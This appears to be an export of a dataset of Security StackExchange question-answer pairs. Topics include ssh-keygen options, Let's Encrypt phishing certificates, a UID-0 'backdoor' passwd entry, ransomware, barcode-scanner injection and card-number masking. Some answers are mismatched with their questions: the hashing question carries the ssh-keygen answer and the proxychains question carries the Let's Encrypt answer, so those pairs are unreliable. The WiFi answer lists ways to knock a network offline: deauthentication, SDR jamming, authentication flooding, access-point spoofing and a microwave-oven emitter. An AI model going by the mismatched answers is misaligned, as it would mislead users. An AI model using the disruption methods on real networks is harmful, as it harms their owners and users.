source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
143,442 | Most users would simply type ssh-keygen and accept what they're given by default. But what are the best practices for generating ssh keys with ssh-keygen ? For example: Use -o for the OpenSSH key format rather than the older PEM format (OpenSSH 6.5 introduced this feature years ago on 2014-01-30 ) How should one calculate how many rounds of KDF to use with -a ? Should -T be used to test the candidate primes for safety? What -a value to use with this? For the different key types, what are the recommended minimum -b bit sizes? etc... (there are a mind-boggling set of options in the manual page ). | I recommend the Secure Secure Shell article, which suggests: ssh-keygen -t ed25519 -a 100 Ed25519 is an EdDSA scheme with very small (fixed size) keys, introduced in OpenSSH 6.5 (2014-01-30) and made default ("first-preference") in OpenSSH 8.5 (2021-03-03). These have complexity akin to RSA at 4096 bits thanks to elliptic curve cryptography (ECC). The -a 100 option specifies 100 rounds of key derivations, making your key's password harder to brute-force. However, Ed25519 is a rather new key algorithm ( Curve25519's popularity spiked only when it was surmised that other standards had been diluted) and its adoption is not yet universal. Large steps were made in 2018, so we're nearly there, but on older systems or for older servers (like CentOS/RHEL < 7 or Ubuntu < 15.04), you can generate a similarly-complex RSA key with 4096 bits: ssh-keygen -t rsa -b 4096 -o -a 100 (You may need to omit the -o option since it requires OpenSSH 6.5+ and is the default starting in v7.8, at which point it was removed from the ssh-keygen man page. This dictates usage of a new OpenSSH format to store the key rather than the previous default, PEM . Ed25519 requires this new format, so we do not need to explicitly state it given -t ed25519 . A previous man page stated that “the new format has increased resistance to brute-force password cracking.” See this answer for more detail.) Do not consider the other new ECC algorithm called ECDSA . It is considered suspect (it has known weaknesses and since the US government has been involved in its development, it may be compromised beyond that). Ed25519 was developed without any known government involvement. Stay well away from DSA (“ssh-dss”) keys: they're not just suspect, DSA is insecure . | {
"source": [
"https://security.stackexchange.com/questions/143442",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/128750/"
]
} |
143,444 | I read about message integrity using hashing. As I know, message integrity is hashing the message content and send to the recipient. If recipient got this message, do hashing again to compare with two hashing value. I have one question about that. May be file size is over 100 MB or something. In my opinion, it may take too long. So I would like to use some fields such as file size, and creation date in hashing. Is that possible or safe way for hashing? | I recommend the Secure Secure Shell article, which suggests: ssh-keygen -t ed25519 -a 100 Ed25519 is an EdDSA scheme with very small (fixed size) keys, introduced in OpenSSH 6.5 (2014-01-30) and made default ("first-preference") in OpenSSH 8.5 (2021-03-03). These have complexity akin to RSA at 4096 bits thanks to elliptic curve cryptography (ECC). The -a 100 option specifies 100 rounds of key derivations, making your key's password harder to brute-force. However, Ed25519 is a rather new key algorithm ( Curve25519's popularity spiked only when it was surmised that other standards had been diluted) and its adoption is not yet universal. Large steps were made in 2018, so we're nearly there, but on older systems or for older servers (like CentOS/RHEL < 7 or Ubuntu < 15.04), you can generate a similarly-complex RSA key with 4096 bits: ssh-keygen -t rsa -b 4096 -o -a 100 (You may need to omit the -o option since it requires OpenSSH 6.5+ and is the default starting in v7.8, at which point it was removed from the ssh-keygen man page. This dictates usage of a new OpenSSH format to store the key rather than the previous default, PEM . Ed25519 requires this new format, so we do not need to explicitly state it given -t ed25519 . A previous man page stated that “the new format has increased resistance to brute-force password cracking.” See this answer for more detail.) Do not consider the other new ECC algorithm called ECDSA . It is considered suspect (it has known weaknesses and since the US government has been involved in its development, it may be compromised beyond that). Ed25519 was developed without any known government involvement. Stay well away from DSA (“ssh-dss”) keys: they're not just suspect, DSA is insecure . | {
"source": [
"https://security.stackexchange.com/questions/143444",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/78382/"
]
} |
143,530 | I recently almost got caught by a phishing attempt, due to the use of a relatively convincing domain name and valid SSL certificate (specifically this website ). When checking the certificate it turns out it was issued by Let's Encrypt. So I went there and as far as I understand the process to issue a certificate is automated - if you own a domain, you can get a certificate. However isn't it a security issue and doesn't it go (at least partially) against the point of SSL certificates? Malicious websites can now look legitimate thanks to these certificates, which makes it a lot more likely that they will succeed. In my case I saw the green padlock on the URL and thought that all was good. Now it seems, due to this certificate issuer, users will be expected to click on that padlock and check who issued the certificate (and close the tab if it's from letsencrypt??). So I'm wondering, given the security risk, why do browsers accept this certificate by default? I'm surprised especially that Chrome does given how careful Google is with security. Do they consider that letsencrypt is a good idea? | I think you are misunderstanding what a SSL certificate actually certifies, and what it is designed to protect against. A standard certificate only certify that the owner of the certificate actually controls the domain in question. So a certificate for g00dbank.com only certifies that the owner controls the g00dbank.com domain. It does not certify that the owner is a bank, that she is good , or that the site is in fact the well known Good Bank Incorporated. So SSL is not designed to protect against phishing. Just because you see the green lock up in the left corner does not mean that everything is well. You also need to verify that you are on the correct website - that you are on goodbank.com (as opposed to the phishy g00dbank.com ) and that goodbank.com is in fact the website of Good Bank Incorporated. To make this easier for the average user, there is something called Extended Validation (EV) certificates. These also verify that you are the legal entity that you claim to be, by requiring you to do some paperwork. Most major browsers highlight them by displaying the name of the owner in the address bar . So to get an EV certificate the phishers at g00dbank.com would have to start a real business (thereby leaving a paper trail), and even then they would probably not get one because their name is to close to a sensitive target. Lets Encrypt does not issue EV certificates. They issue ordinary ones. But the phishers you encountered could have gotten a certificate from anywhere. In fact, as IMSoP points out in comments, the method Lets Encrypt uses is employed by many of the established CA:s as well, the only difference being that Lets Encrypt is more efficient and cheaper. So this has nothing to do with Lets Encrypt specifically, and blocking them would solve nothing. | {
"source": [
"https://security.stackexchange.com/questions/143530",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1873/"
]
} |
143,532 | I am learning to use nmap . I am observing that most of the times when running a command like proxychains nmap -sT -PN -n -sV -p 80 XX.XX.XX.XX , I am getting the following output: Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-25 18:11 UTC
|S-chain|-<>-127.0.0.1:9050-<>-162.213.76.45:8080-<>-203.130.228.60:8080-<--timeout
Nmap scan report for XX.XX.XX.XX
Host is up (16s latency).
PORT STATE SERVICE VERSION
80/tcp closed http
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . What I can understand is that the server failed to connect to the third proxy. What I do not understand is: Does that mean that nmap packets are going from the second proxy to the target directly or the proxychaining is failing entirely and nmap packets are sent directly from my pc and revealing my identity? Note: I'm running the tor browser , and therefore routing my proxychains through the tor network. | I think you are misunderstanding what a SSL certificate actually certifies, and what it is designed to protect against. A standard certificate only certify that the owner of the certificate actually controls the domain in question. So a certificate for g00dbank.com only certifies that the owner controls the g00dbank.com domain. It does not certify that the owner is a bank, that she is good , or that the site is in fact the well known Good Bank Incorporated. So SSL is not designed to protect against phishing. Just because you see the green lock up in the left corner does not mean that everything is well. You also need to verify that you are on the correct website - that you are on goodbank.com (as opposed to the phishy g00dbank.com ) and that goodbank.com is in fact the website of Good Bank Incorporated. To make this easier for the average user, there is something called Extended Validation (EV) certificates. These also verify that you are the legal entity that you claim to be, by requiring you to do some paperwork. Most major browsers highlight them by displaying the name of the owner in the address bar . So to get an EV certificate the phishers at g00dbank.com would have to start a real business (thereby leaving a paper trail), and even then they would probably not get one because their name is to close to a sensitive target. Lets Encrypt does not issue EV certificates. They issue ordinary ones. But the phishers you encountered could have gotten a certificate from anywhere. In fact, as IMSoP points out in comments, the method Lets Encrypt uses is employed by many of the established CA:s as well, the only difference being that Lets Encrypt is more efficient and cheaper. So this has nothing to do with Lets Encrypt specifically, and blocking them would solve nothing. | {
"source": [
"https://security.stackexchange.com/questions/143532",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/117464/"
]
} |
143,542 | I was watching a defcon video a couple of weeks ago where a guy was demonstrating how barcode readers were generally quite easy to hack. He went on to say things such as with most systems the input isn't sanitised (sounds similar to SQL injection) and that most of them were configurable by bar codes easily obtained by the manufacturer. Combined with the fact that a machine can quickly be configured to read all types of barcodes including the ones that can store in excess of 1000 characters, are barcodes a vulnerability? And how could one prevent this? So far the possible vulnerabilities I can see are SQL injection and buffer overflows. | Yes, barcode scanners present a potential vulnerability. You need to prevent attacks from this vector in the same way you'd prevent attacks from any input vector, such as a network connection or a keyboard. Validate inputs in the app, not the scanner. Do not rely on configuring the scanner to only deliver 12 digit UPC-A barcodes. As every web app developer quickly learns, trusting the client to perform input sanitization is a giant security hole. Use length checks in the app to ensure that buffer overflows can't be exploited. Perform white-listing value checks to make sure you don't have out-of-bounds characters (for example, if you're expecting the user to scan only a product UPC-A or EAN-13 barcode, you should throw an exception if the input detects any non-digit values.) Code defensively. Just as with a web app, you need to make secure coding choices such as parameterized SQL. You should already be doing this to protect against keyboard-entered SQL injection attacks; barcodes are nothing special here. Harden your devices. Most barcode scanners are initially configured by scanning a series of special manufacturer provided barcodes (your scanners' documentation will describe these symbols.) Read the scanners' documentation to find the way to configure the scanners from the host computer via the data connection. Once you can configure the scanners from the computer, do so. Among the configuration items to set, you should disable the scanner's ability to read the configuration barcodes. | {
"source": [
"https://security.stackexchange.com/questions/143542",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/126881/"
]
} |
143,599 | Is it possible that someone made an attack (DoS or something else) to my Wi-Fi router (without knowing of the password) and make my router's signal unavailable? 1) How it can be done? 2) What are remedies? | There's a lot of ways you can attack a WiFi without knowing any passwords: Physical layer attacks: Simply jam the frequency spectrum with your own signal. That signal might just be noise, but it might also be a WiFi of your own under heavy load, with the nodes in that WiFi being configured not to play nice with others. (depending on the WiFi chipset, that can be extremely easy) Spectrum can only be used once! Tool : noise source (e.g. Gunn Diode, SDR device ), or normal AP Electromagnetic sledgehammer: EMI gun. Take microwave oven oscillator, attach directive antenna, pray you don't cook someone's (your) brain, and point in the rough direction of the access point. Poof! Microwave ovens operate in the 2.4 GHz band, and thus, antennas of Access Points are picking up exactly that energy. Tool : Microwave oven, some sheet metal, lack of regard for other people's property and own health, or extended RF knowledge MAC and Network layer attacks: Especially for networks using WEP (noone should be using this anymore, but sadly...) it's easy to forge what is called deauthentication packets – and thus, to throw out stations from your WiFi. Tool : Aircrack-NG's aireplay Targetted jamming: As opposed to simply occupying the channel with noise or your own WiFi, you can also build a device that listens for typical WiFi packet's beginnings (preambles), and then, just shortly, interferes. Or just sends fake preambles periodically, or especially when it's silent. That way, you can corrupt selected packets, or fake channel occupancy. Tool : Commodity off-the shelf SDR authentication attacks: at some point, even "proper" clients for your WiFi need to register with the WiFi. That mechanism can of course be forced to its knees by simply sending hundreds of authentication requests every second, from randomly generated MAC addresses, or even from MAC addresses of clients you know (by observation) exist. There's no solution to the problem for the AP – either it succumbs to the overload of auth packets, or it starts blocking out legitimate users. Tool : your network card, 10 lines of bash scripting Man-in-the-Middling / access point spoofing: With anything short of WPA(2)-Enterprise, nothing proves that the access point calling itself "Toduas AP" is actually your Access Point. Simply operating a slightly higher-powered access point with the same ID string and, if necessary at all, a faked AP MAC address (trivial, since just a setting), will "pull" clients away from your access point. Of course, if the spoofing Access Point doesn't know the password, users might quickly notice (or they don't); however, noticing things don't work is nice, but doesn't help them. Tool : a random normal access point You have to realize that it's a privilege, not a right, to have your WiFi use a channel. WiFi happens in the so-called ISM bands (Industrial, Scientific, Medical usage), where operators of transmitters don't have to have an explicit license. That means it's OK for everyone to use that spectrum, as long as they don't intentionally harm other devices and are not easily damaged by interference. So, it's absolutely legal for someone to operate a high-definition digital camera stream that occupies the whole WiFi channel. That will effectively shut down your WiFi. If you need something that no-one can mess with, wireless is, by definition, not the way to go. | {
"source": [
"https://security.stackexchange.com/questions/143599",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56001/"
]
} |
143,781 | My girl was scammed and entered my home address and my credit card number on a fake website (through a Facebook ad). What risks am I additionally incurring, apart from having lost €40 (the money that was on the card, and luckily that is one of the cards that you have to charge in advance to make a purchase)? Is there something especially urgent I have to do? My card description: Can only pay what I first charge in Do not allow to transfer money to my bank account I choosen that card to lose at most the money is in it (Even if my bank insisted I choose instead another type of card). | Call the credit card company! They have procedures for this including blocking your credit card and replacing it. You might even be able to get the 40€ back.
There is a lot of articles about this online . If you knowingly ignore the issue you might be liable for any future damages by fraudulent credit card charges. | {
"source": [
"https://security.stackexchange.com/questions/143781",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52239/"
]
} |
143,934 | Long story short I was making sure a web app didn't create a LFI vuln by attempting to open /etc/passwd with it. My first attempt to prevent LFI was unsuccessful and listed out the file, and I noticed this at the bottom: backdoor:x:0:0::/root:/bin/bash What does this mean, and is it malicious? If so how do I remove it. | Well, from your question I assume you know what a line in /etc/passwd is, so your question strikes me as a bit of odd. Unless, of course, you're going through some kind of test and don't really know your ways around a unix system and try to pass easily by cheating with us. However: That's a line in /etc/passwd that defines a user called backdoor , which prefers the bash shell. The bad news is (aside from the fact that someone utterly stupid or an author of some kind of admin test used the name backdoor for this user) that this account uses user ID 0 and Group ID 0, and home /root , and all three of those should be absolutely exclusive to root , the super user. Your system has been compromised. You'll need to remove the system from the network, do a postmortem analysis, and set it back up from scratch, hopefully closing the vulnerability you found in your postmortem analysis that allowed them do this in the first place. (Leaving the system up and trying to "clean it up" is a losing game because who know what other rootkits or backdoors they have planted). | {
"source": [
"https://security.stackexchange.com/questions/143934",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66722/"
]
} |
144,055 | For the record, I understand that absolutely no service is safe, and "the only way to keep a computer from getting hacked is to never connect it to the network". So, we've got that out of the way. I wanted to understand the Dropbox has started encrypting its data-at-rest with 256-bit AES encryption. So, my simple question is, do we still need to encrypt our Dropbox contents with TrueCrypt? Are there any real advantages in terms of security/encryption in using Dropbox? | It does not matter much how the data are encrypted as long as the owner of the data is not the only one in control of the encryption key. This in effect means that data encryption and decryption should only be done at the client and only in a safe environment where only trusted software is running. This is not the case with Dropbox: Dropbox has access to the plain data both from the Dropbox client running on your system and on the server side before encrypting for rest. Also Dropbox can decrypt the data whenever they want because they have access to the encryption key. And they will do it for sure and without you noticing when law enforcement requires it. Whether you consider this safe enough for your own use is your own decision. | {
"source": [
"https://security.stackexchange.com/questions/144055",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/73443/"
]
} |
144,155 | My webserver has been up for < 25 hours and has already been crawled for various default pages, just to name one /administrator/index.php . I understand that this is very common and it's not really an issue for me, as I have secured the server in a decent manner. For the following idea, let's assume I don't care about the resulting traffic. What if I were to create a number of the most requested files, usually representing administrator interfaces or other attack vectors of a common website. The file (e.g. /administrator/index.php ) could look like the following: <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>/administrator/index.php</title>
</head>
<body>
content ^1
</body>
</html> But for the actual body content, I just ram a couple of GB with random strings in there. For example dd if=/dev/urandom bs=10M count=400 | base64 > /tmp/content and then wrap the above HTML tags around the file. What would typical crawlers do on such an event? | You're hurting yourself. The "attacker"/crawler... probably doesn't pay for their traffic or processing power (ie. they use a botnet, hijacked servers or at least are on a connection that doesn't make them pay for traffic), but you will be billed for traffic and CPU/storage/memory, or your server's hoster has a "fair usage" clause, under which your server's connection will be throttled or cut off if you serve Gigabytes of data on the short term, or your storage bandwidth will be reduced, or your CPU usage limited. Also, why should anyone be so stupid to download Gigabytes of data when they're just looking for a specific page? Either, they're just looking for existence of that page, in which case the page's size won't matter, or they will definitely set both a timeout and a maximum size – no use waiting seconds for a server to complete a response if you've got hundreds of other servers to scan, and especially not when greylisting is a well-known technology to slow down attackers. | {
"source": [
"https://security.stackexchange.com/questions/144155",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/127732/"
]
} |
144,395 | I am helping a friend which is an accountant and got all of her books locked due to this. Here are some details: BTC address of the attacker: 1MBwkTssJkqRvXmAFcSEZ3xTD39A9rkyYA Email: [email protected] File name example: [email protected] Filename of ransom notice: How to restore files.hta Neither globe nor globe2 could help ("error: reference files missing" after dragging and dropping both an encrypted and non encrypted file to it at once). Also this thread at Bleeping Compuer did not help much. My friend paid 1 BTC to the scammers, after which they sent no key and asked for more money (obviously). Unfortunately, I am not much of a cryptographer, so I am seeking your help to decrypt the files. Edit:
This is what Recuva says ( unable to recover since file x was overwritten by file y.lock ) UPDATE: No solution was found, the person had to format her computer and lose all the data. | I don't think you will see those files again, unless you have a back up. You can view the transaction history of the Bitcoin address you were asked to pay to here . As you can see, there are 303 transactions in total and many of them are for 1 BTC. That implies that the same Bitcoin address have been given to multiple victims. This in turn means that it is impossible for the perpetrators to know who has paid, and what encryption key should be sent. (Hence the odd request for a screenshot, I presume.) So either they are incompetent in their handling of the ransom, or much more likely, they are not restoring any files, instead just milking victims on more and more money. And if they are not restoring any files, why even bother to encrypt them when you can just overwrite them with random garbage? So those files are probably gone, no matter if you pay or not. Edit: There are some good points in comments. Potentially the screenshots could be used as proof of payments, although a flawed one. And even if payment does not lead to decryption the files might still be encrypted. But even with this taken into account, unless a remedy for this specific version of ransomeware pops up, you are very unlikely to be able to restore your files. Nkals answer has a great link to a repository of such remedies. Edit 2: This Troy Hunt blogpost follows a similar line of reasoning about extortion and Bitcoins. Edit 3: The recent WannaCry outbreak has made me reconsider this answer. Apparently WannaCry uses three hardcoded bitcoin wallets , but people still seem to have gotten their files decrytpted . So I think the base assumption of this answer is wrong. | {
"source": [
"https://security.stackexchange.com/questions/144395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/125331/"
]
} |
144,428 | According to Apple, Touch ID the probability of a fingerprint matching is 1:50000 while the probability of guessing a four digit passcode is 1:10000. Statistically speaking, this would make Touch ID five times more secure. But the answer isn't that simple. Reconstructing a fingerprint is far easier than reconstructing a passcode. Although a fingerprint is unique, you are basically walking around with the security key on you at all times. I see have a fingerprint is like have the four digits of a passcode, just not in the right order (is this the right thinking though?). Regardless, I'm not interested in a passcode. I'm interested in a password . Software applications allows you to login to social media, online transactions, and even bank accounts. Is a 1:50000 ratio really that secure when being compared to a password, especially when looking at such sensation data? I am more interested in after the attacker has the password or fingerprint, not so much brute forcing methods. With a strong password it seems as though the odds are much greater. Although a fingerprint is unique per person, a password is unique per situation. If I have your fingerprint I have your email, you social media accounts, and your bank information. Where as a password I may only have your Facebook. Is fingerprint scanning being rapidly growing solely on convenience or is it more secure for the typical user? Advertisement claims is more convenient and more secure. However, is this normally the case? | Usability v/s Security Matrices isn't resolved with dependent
Biometric Authorization & Authentication For example, before I start - have a look at how the basic foundation of security is built in matrices: It can be easily concluded that High Security unfortunately comes with low usability features. How Do I know This? I have been in ongoing research on secure architectural implementation of possible authorization & authentication mechanisms using iOS & Android - both. The framework isn't decided & with all the research experience, I have nailed down few points here which might be worth noting down. Possible Risks If it were to be primary security protection to access critical
assets, there are traders, who can knock off an individual in
person, chop off his thumb & login. It could be that simple for
those who have finance data kept in secure login (primary use case)
procedures. Other threats could involve having the print collected using high
resolution imaging & then apply image processing techniques to
collect clone of the thumbprint & use it later having it imprinted
on thin plastic filament. That way there is a second bypass possible
here. Materials used in building a phone might collect prints & afterwards
the specific part can be physically taken apart to have it cloned &
address security bypasses. In contrary to using normal passwords, The latter - it could be in users mind solving the problem of physically not compromised. All it needs is user security level awareness of having the password & login strict to a compliant firm type e.g. PCI-DSS, etc (in cases of financial data fraud). There's usability, but then there's security. Hence, more usability will lead to obvious broader security risk surfaces. Therefore, below is worth a consideration of using biometric devices such as the following: iris (L) termogram (L) DNA (L) smell (L) retina (L) veins [hand] (L) ear (M) walk (M) fingerprint (M) face (M) signature (H) palm (M) voice (H) typing (M) Note: H for (High), M for (Medium) & L for (Low) risks. Let's conceptualise the same in matrices as per basic construct mentioned earlier & see if it matches the criteria: Overall Risks Factors : The physical attack Offer a clean glass of champagne to the target victim during a social
physical event, and manage to recover the glass to get a high
definition picture of the target fingerprints. The storage attack All these fingerprints have to be stored either locally or centrally.
Steal the Phone5 of the target victim and through physical interfaces
get the internal content and attack the stored and crypted
fingerprint. If they are stored centrally, since we aren't in the
magic space time where 0 probability live, this central storage will
get broken sooner or later. The algorithmic attack As any other authentication technic, fingerprint reading, storing and
comparing will use algorithms. Hence this authentication is also
exposed to algorithmic attacks. The aforementioned methods have risks. There's an important point about biometric authentication that many of the commercial installations respect, but which is not immediately obvious: Banks should never rely on biometrics to supply both authentication and identification. Biometric measurements are useful, but they're in no wise unique. Two people may not have the exact same fingerprint, hand geometry, or iris patterns, but the measurements are often lossy enough to allow for collisions. Biometrics need to be just one part in a multi-factor authentication system & hence can be fit when 2FA & Biometric go side by side. Other Usability Limitations : Aside from these risks, other limitations include the following: Error rate - false accepts and false rejects are still unacceptably high for many types of biometrics. User acceptance - still not widely trusted by users; The various privacy concerns are still quite high, and the idea that a part of your body is now a security mechanism is still not relevant to some citizens. OP's question compares the same with traditional password - hence traditional password schemes are less probable & have lesser exposure to threat surfaces than the prior Biometric Security Mechanisms. Using more compliant keeping the traditional passwords & biometric optional post prior login methods have been successful - might be the take-away. | {
"source": [
"https://security.stackexchange.com/questions/144428",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/116721/"
]
} |
144,466 | I use Linux to store private data and backups for my team because it is said that Linux is itself very secure from malware and doesn't need antivirus. But now as ransomware is spreading and has started affecting business PCs that run Windows, so it won't be too long that a new variant of ransomware is released or there might already be that can affect Linux systems also. I don't want to risk our data getting encrypted by ransomware just for bitcoins. Do Linux systems need anti-virus now for protection against this threat? | There are actually multiple parts of the question: Is Linux affected by malware and especially ransomware? Do antivirus products exist for Linux? Do these products help against this threat? To answer the first: Yes, there is malware for Linux and there is also ransomware. Currently it is usually propagated in a different way compared to Windows: Malware on Windows is mostly distributed by phishing mail and web and makes use of platform specific vulnerabilities and features, i.e. currently mainly windows scripting host, macros in office documents and vulnerabilities in Office. On Linux systems instead it is usually installed by attacking the server, often by using security issues in Wordpress and other CMS. But this is mainly because server use of Linux is large while desktop use is still rare. The capabilities and vulnerabilities needed to spread ransomware in a similar way to Windows do often exist on Linux too although some differences (like the need to explicitly set the permissions of executable files) make some exploits harder. As for the second, i.e. are the antivirus products for Linux: There are both free products like ClamAV and commercial products available. And finally, do these antivirus help against malware/ransomware targeting Linux? They mostly don't. These antivirus products care mainly about protecting against attacks targeting Windows and are usually used to scan files or mails which might be served to Windows systems. Thus they are for example useful on a mail server or file server and also on a web server to make sure that the server is not used to spread malware. But they don't even protect fully against attacks targeting Windows. They might have some code in it to detect some well known (and sometimes only proof of concept) malware against Linux but they will not protect against new things. There are also products which scan for traces of existing system compromise and sometimes these are called antivirus but often not. | {
"source": [
"https://security.stackexchange.com/questions/144466",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
144,536 | When studying Dan Boneh's slides for 'Session Management and
User Authentication' (2011) he mentions 'secret salts' on the slide 'Further defences' (slide 48 out of 58). He suggest to store in the datbase: Alice|SA|H(pwA , SA , rA) In which Alice is the username, SA the salt associated with Alice and H(pwA , SA , rA) the result of hashing Alice's password pwA together with the salt and a small random value rA . I don't understand why adding a short random value r (8 bits) slows the verification down by a factor of 128 while an attacker is slowed by a factor of 256. | This would probably be explained in the auditory lecture that these slides accompany. My guess is that he's calculating this assuming that users generally enter their correct passwords. You only need to cycle through options for r until you find one that produces a correct hash. If you've been given the correct password, then you will come across an r that produces a correct hash; when exactly this happens will vary (since it's random), but on average you'll go through half the total options (2**8 = 256, 256/2 = 128) before finding it. However, the attacker will usually be trying incorrect passwords. This means they'll have to try every single option of r , which is the full 256. | {
"source": [
"https://security.stackexchange.com/questions/144536",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132625/"
]
} |
144,551 | As the title says, do those 4 bytes carry a meaning (I assume they do as apparently the smile changes depending on the key bitness)? The two files below have been encrypted with the different keys, but within the same key those 4 bytes are always the same. If these 4 bytes are always the same, is there any built-in way in PGP/GPG to prevent an attacker from knowing what file they may have obtained/intercepted, other than stripping these bytes in transit and re-creating them at destination? | Yes, it's a coincidence that the first bytes appear to you as these symbols. They are part of the OpenPGP message format specification ( RFC 4880 ) and vary depending on the packet properties. Let's create a file containing only those bytes and try to read it as a GPG message: $ echo " \x85\x02\x0c\x03 " > foo.gpg && gpg --list-packets foo.gpg
# off=0 ctb= 85 tag=1 hlen=3 plen= 524 :pubkey enc packet: version 3 , algo 255, keyid 0AFFFFFFFFFFFFFF
unsupported algorithm 255 The first byte ( 0x85 = 0b10000101 ) is the cipher type byte (CTB) that describes the packet type. We can break it up as follows: 1 : CTB indicator bit 0 : old packet format (see RFC 1991 ) 0001 : public-key-encrypted packet 01 : packet-length field is 2 bytes long The second and third bytes denote the packet length ( 0x020c = 524 ). The fourth byte ( 0x03 ) means it's in the version 3 packet format. As you can see, these bytes are meaningful and not magic number constants that you can remove without losing information. If you cut them off, you are corrupting the GPG packet and it will require some guesswork to reconstruct it. The bytes are shown as smileys and hearts because that's how your (probably DOS) terminal displays non-printable control characters. In character sets that originate from code page 437 , low bytes outside the printable ASCII range are traditionally represented as icons. Here's the original CP437 on an IBM PC: (Image source) | {
"source": [
"https://security.stackexchange.com/questions/144551",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/132633/"
]
} |
144,608 | If so, what are these OSes? Are they specially crafted? How difficult is it to apply this kind of program verification to the everyday OSes we use? If not, why haven't people invented such OSes? Package signature verification is quite common with today's package managers. What I'm asking about is signature verification at loading time. | iOS and Android both validates the signature of every single piece of code before loading them into memory. Windows UWP apps are also all checked for signature before being loaded as well. Package signature verification is quite common with today's package managers. What I'm asking about is signature verification at loading time. The difference is massive in terms of performances. A package signature is checked when it is installed and not afterward. To be effective, code signing must be checked for every binary before it is executed or loaded. Furthermore, special care must be taken by the OS (or runtime environment) in order to make sure a memory page marked as executable is signed (or, at least, that is has been loaded from something that was properly signed). That requirements is extremely hard to enforce on any environment that wasn't designed with code signing in mind because it tends to break a lot of legacy code. | {
"source": [
"https://security.stackexchange.com/questions/144608",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/96843/"
]
} |
144,635 | Recently, my employer blocked access to Gmail, Yahoo Mail, etc., because an employee downloaded an email attachment which contained ransomware and got their disk encrypted. QUESTION : How does ransomware get the root/admin permissions to encrypt your disk? Presumably, the person who downloaded it had to have entered the admin/root password at some point. | Ransomware doesn't get root/admin permissions, because it does not need to. It does not encrypt the disk or files protected by the operating system (executables, configuration, credentials), it encrypts files created and stored by the users (data); and all it requires to do so, is the same level of access as the users themselves. Just like a user would create a password-protected zip and delete the original file, so does ransomware (except, it keeps the password in secret and makes sure the original file is really inaccessible). That's the whole reason why ransomware is so successful, it encrypts what is the most valuable for users and companies: their work. | {
"source": [
"https://security.stackexchange.com/questions/144635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94605/"
]
} |
144,843 | I recently set up a web server that—among others—serves ownCloud to some of my users. I got a Let’s Encrypt SSL Certificate because I didn’t want to use a self-signed certificate like the one ownCloud uses out of the box. I configured Apache to rewrite all HTTP traffic to HTTPS correctly. Now ownCloud shows me a message constantly, asking me to enforce HSTS (HTTP Strict Transport Security). Given that Let’s Encrypt Certificates are only valid for 90 Days and that my HTTP redirection already works, should I really enforce HSTS? | Yes, you should activate HSTS . HTTPS without HSTS is significantly weaker since it makes your users vulnerable to downgrade attacks . Sending a HSTS header guarantees that users will directly connect to your website over SSL after their very first visit (trust-on-first-use) and until the specified timeout is reached. The choice whether to activate HSTS or not doesn't really depend on which CA you're using rather than if you are sure you will continue to support HTTPS in the future. That is, as soon as you disable HTTPS again, any user whose HSTS timeout hasn't expired yet will be unable to connect to your site. If you are unsure about how long you will keep SSL support, you might want to start with short HSTS expiry times to avoid locking out your visitors for too long. Don't confuse HSTS with HPKP : A HTTP Public Key Pinning header tells the browser to associate a specific public key with your site. Here, pinning for the wrong or expired certificates can make your site unavailable to previous users. But for HSTS, the particular certificate chain doesn't matter and you can change it as needed. | {
"source": [
"https://security.stackexchange.com/questions/144843",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122008/"
]
} |
144,980 | Let's say, on any software (that is installed on Client-Side OS), is it possible, to alter the software in such way (i.e. Zip Passwords) so for incorrect input it redirected to correct "result", like: Is it possible to alter software logic to execute the command instead of another command? If so, then nothing can be protected from cracking? | In short, yes, you can modify the executable, use a debugger, etc. to alter the logic of the code being executed. But, that may not be enough. To use your example of ".zip passwords", password protected archives use the password to derive an encryption key. Unless you supply a correct password, the generated key will be wrong, and even if you modify it to use a wrong key, it will not successfully decrypt the ZIP file. Another scenario might involve a setuid executable which runs with higher privileges. You could run it under a debugger, or copy it to your user account and make changes, but all this will achieve is running it with your user's permissions, thus defeating exploitation possibilities. | {
"source": [
"https://security.stackexchange.com/questions/144980",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56001/"
]
} |
145,070 | I visited a local McDonald's, and I noticed part of my Visa number repeated on the receipt like this: NNNN NN__ ____ NNNN . (So out of a total of 16 digits it breaks down like this: First six digits revealed, middle six digits hidden, final four digits revealed again.) So only 6 digits were hidden. Finding the correct number would take 1.000.000 guesses, but there is also a checksum that further decreases the number of guesses needed to 100.000 (by my, possibly wrong, calculation). Is there a policy on how many digits can be revealed? Could cards be in danger if companies hide only the six middle digits? | As per PCI, the first 6 (BIN) and the last 4 can be shown, others should be masked: From an official 2008 PDF: PCI Data Storage Do’s and Don’ts : Never store the personal identification number (PIN) or PIN Block. Be
sure to mask PAN whenever it is displayed. The first six and last four
digits are the maximum number of digits that may be displayed. PAN is Primary Account Number So as far as compliance goes, the data terminal used to print the receipt is compliant. | {
"source": [
"https://security.stackexchange.com/questions/145070",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133142/"
]
} |
